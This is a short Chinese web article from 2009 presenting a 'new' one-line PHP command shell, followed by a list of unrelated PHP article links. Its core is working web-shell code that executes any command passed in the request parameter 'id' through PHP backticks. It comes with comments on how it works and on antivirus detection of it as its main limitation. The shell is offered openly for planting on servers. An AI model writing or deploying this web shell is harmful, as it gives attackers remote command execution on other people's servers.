php一句话cmdshell新型 (非一句话木马)

更新时间：2009年04月18日 12:04:17 作者：

php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)；

<?php 
/*一个新型的php一句话cmdshell(非一句话木马) 
//原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令，并返回命令执行的结果(string类型)； 
//局限性:特征码比较明显，``符号在php中很少用到，杀毒软件很容易以此为特征码扫描到并警报；``里面不能执行php代码； 
//write by skyfire 
*/ 
echo `$_REQUEST[id]`; 
?>

您可能感兴趣的文章:

PHP设计模式之工厂模式(Factory Pattern)的讲解
今天小编就为大家分享一篇关于PHP设计模式之工厂模式(Factory Pattern)的讲解，小编觉得内容挺不错的，现在分享给大家，具有很好的参考价值，需要的朋友一起跟随小编来看看吧
2019-03-03
关于PHP中协程和阻塞的一些理解与思考
这篇文章主要给大家介绍了关于PHP中协程和阻塞的一些理解与思考，文中通过示例代码介绍的非常详细，对大家学习或者使用PHP具有一定的参考学习价值，需要的朋友们下面跟着小编来一起学习学习吧。
2017-08-08
php解析http获取的json字符串变量总是空白null
这篇文章主要介绍了php解析http获取的json字符串变量总是空白null的解决方法，个人经验的总结，这里推荐给大家。
2015-03-03
PHP stream_context_create()作用和用法分析
创建并返回一个文本数据流并应用各种选项，可用于fopen(),file_get_contents()等过程的超时设置、代理服务器、请求方式、头信息设置的特殊过程。
2011-03-03
mysql 全文搜索技巧
mysql 全文搜索技巧...
2007-04-04
利用PHP实现短域名互转
如何使用PHP实现短域名互转？下面的代码可以帮助你实现，非常简单，需要的朋友可以参考下
2013-07-07
$php中\r \r\n \t的区别示例介绍$
php中\r \r\n \t的区别示例介绍
这篇文章主要介绍了php中\r \r\n \t的区别,需要的朋友可以参考下
2014-02-02
php include和require的区别深入解析
本篇文章是对php中include与require的区别进行了详细的分析介绍，需要的朋友参考下
2013-06-06
解析php中call_user_func_array的作用
本篇文章是对php中call_user_func_array的作用进行了详细的分析介绍，需要的朋友参考下
2013-06-06
探讨PHP删除文件夹的三种方法
本篇文章是对PHP删除文件夹的三种方法进行了详细的分析介绍，需要的朋友参考下
2013-06-06